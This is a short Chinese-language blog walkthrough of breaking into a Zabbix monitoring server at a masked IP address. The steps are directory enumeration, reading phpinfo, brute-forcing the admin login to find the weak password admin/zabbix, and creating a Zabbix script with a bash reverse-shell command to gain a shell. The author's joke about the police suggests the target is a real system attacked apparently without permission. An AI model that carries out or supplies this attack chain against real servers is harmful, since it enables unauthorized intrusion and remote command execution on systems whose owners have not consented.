信息搜集

先是枚举了一下目录:

图片

得到了一些可利用的文件:

1
2
3
[06:13:52] 200 -   86KB - /phpinfo.php
[06:13:56] 200 - 2KB - /setup.php
[06:14:01] 200 - 2KB - /users.php

phpinfo中可以得到一些信息:用的是Linux操作系统:

图片

通过DOCUMENT_ROOT函数得知网站的绝对路径是/opt/httpd-2.4.29/htdocs

图片

接着来到:http://xx.xx.xx.xx/setup.php,是一个安装页面,不管他。要是我重新给他安装了web,我估计第二天就能去警察叔叔那里喝茶谈人生了

图片

第三个页面是:http://xx.xx.xx.xx/users.php:

图片

弱口令

掏出我的BurpSuite+大字典集合得到账号密码为:admin / zabbix 进入到了后台:

图片

Getshell

在管理-脚本-创建脚本写入反弹shell命令:

1
bash -i >& /dev/tcp/0.0.0.0/6666 0>&1

图片

在监测-问题处打开一个主机,然后找到刚刚创建的脚本power-liu

图片

图片

图片